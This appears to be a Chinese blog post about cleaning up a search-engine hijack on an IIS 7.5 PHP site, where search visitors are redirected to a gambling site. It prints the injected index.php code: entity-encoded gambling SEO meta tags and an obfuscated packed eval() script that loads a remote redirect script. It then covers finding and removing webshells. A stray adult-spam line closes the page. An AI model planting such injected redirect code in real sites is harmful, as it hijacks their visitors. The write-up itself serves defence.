訂閱本站
收藏本站
微博分享
QQ空間分享

iis7.5 php網站搜索引擎劫持處理案例

分類:運營 瀏覽: 評論:

收到朋友微信求助說其中一個php網站被劫持,一直找不到原因,由于他是做網站建設的,服務器上的網站非常雜,存在漏洞被利用然后劫持也是很正常。接下來以這個案例說說網站劫持怎么修復

歷史處理案例1:iis7.0全部網站被劫持處理過程分享,如何解決網站劫持!

歷史處理案例2:百度 360 搜狗搜索引擎劫持攻擊處理過程

百度收錄的快照信息:

正常輸入網址不會跳轉,通過百度 360 搜狗等搜索引擎訪問就會跳轉到一個博彩網站,看來黑客有意躲避

登錄ftp下載index.php存在異常代碼如下:

<meta name="viewport" content="width=1250" /> 
<title>&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#32;&#80;&#75;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#32;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24320;&#22870;&#32467;&#26524;&#32;&#45;&#32;&#112;&#107;&#49;&#48;&#30452;&#25773;&#32593;</title>
 <meta name="keywords" content="&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#35760;&#24405;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24320;&#22870;&#32593;&#44;&#112;&#107;&#49;&#48;&#21271;&#20140;&#36187;&#36710;&#32593;&#36186;&#44;&#21271;&#20140;&#36187;&#36710;&#32593;&#36186;&#44;&#21271;&#20140;&#36187;&#36710;&#24102;&#29609;&#44;&#21271;&#20140;&#36187;&#36710;&#32593;&#36186;&#32676;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#25216;&#24039;&#44;&#21271;&#20140;&#36187;&#36710;&#24590;&#20040;&#29609;&#36186;&#38065;&#44;&#21271;&#20140;&#36187;&#36710;&#32;&#21513;&#31077;&#23089;&#20048;&#44;&#21271;&#20140;&#36187;&#36710;&#23448;&#32593;&#44;&#21271;&#20140;&#36187;&#36710;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;" />
 <meta name="description" content="&#21271;&#20140;&#36187;&#36710;&#44;&#80;&#75;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#25552;&#20379;&#12304;&#99;&#120;&#56;&#56;&#99;&#112;&#46;&#99;&#111;&#109;&#12305;&#35814;&#23613;&#30740;&#31350;&#20998;&#26512;&#24635;&#32467;&#44;&#20998;&#20139;&#21271;&#20140;&#112;&#107;&#49;&#48;&#24320;&#22870;&#35270;&#39057;&#44;&#112;&#107;&#49;&#48;&#32467;&#26524;&#20998;&#26512;&#44;&#21271;&#20140;&#36187;&#36710;&#24179;&#21488;&#44;&#112;&#107;&#49;&#48;&#32593;&#19978;&#25237;&#27880;&#44;&#21271;&#20140;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#112;&#107;&#49;&#48;&#36807;&#24448;&#21508;&#24320;&#22870;&#35760;&#24405;&#44;&#112;&#107;&#49;&#48;&#24320;&#22870;&#32467;&#26524;&#44;&#112;&#107;&#49;&#48;&#32593;&#19978;&#24320;&#25143;&#44;&#112;&#107;&#49;&#48;&#24320;&#22870;&#44;&#19987;&#19994;&#30340;&#24320;&#22870;&#35270;&#39057;&#21271;&#20140;&#112;&#107;&#49;&#48;&#32593;"/>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\d\\e\\1\\m\\j\\8\\n\\0"]["\\6\\4\\9\\0\\8"](\'\\i\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\c\\7\\0\\8\\h\\0\\5\\f\\b\\q\\b\\2\\1\\4\\9\\3\\0\\7 \\2\\4\\1\\c\\7\\o\\0\\0\\3\\2\\p\\5\\5\\6\\6\\6\\a\\1\\3\\d\\b\\2\\r\\a\\1\\e\\j\\5\\1\\h\\1\\a\\f\\2\\7\\g\\i\\5\\2\\1\\4\\9\\3\\0\\g\');',28,28,'x74|x63|x73|x70|x72|x2f|x77|x22|x65|x69|x2e|x61|x3d|x64|x6f|x6a|x3e|x78|x3c|x6d|x79|window|x75|x6e|x68|x3a|x76|x38'.split('|'),0,{}))
</script>

朋友說刪除后一天內又會掛回去,既然能修改頁面內容必定存在后門或者有ftp權限等  查看ftp日志并沒有收獲,WebShellKill走一波發現有所收獲掃出幾個后門木馬和小馬 黑客也相當之狡猾把木馬文件時間修改成幾年前 可惜網站日志沒有開啟無法追查后門的由來。

網頁木馬包含asp大馬 php大馬 php一句話 php小馬

為了能徹底處理掉這些后門開啟網站訪問日志,刪除劫持代碼靜觀幾天待再次修改主頁再分析日志,下為最近訪問日志

通過把16號-18號的日志進行篩選查實存在10幾個后門,最后把全部木馬后門刪除 修改網站目錄權限再次進入觀察

最后建議把網站日志開啟,出現被黑可以通過日志進行分析人工排查 市面上能掃后門的工具相當之多比如WebShellKill 安全狗 云盾 云鎖等等

TAG:網站劫持

文章評論

留言與評論(共有 0 條評論)
   
驗證碼:
美女胸18大禁视频免费网站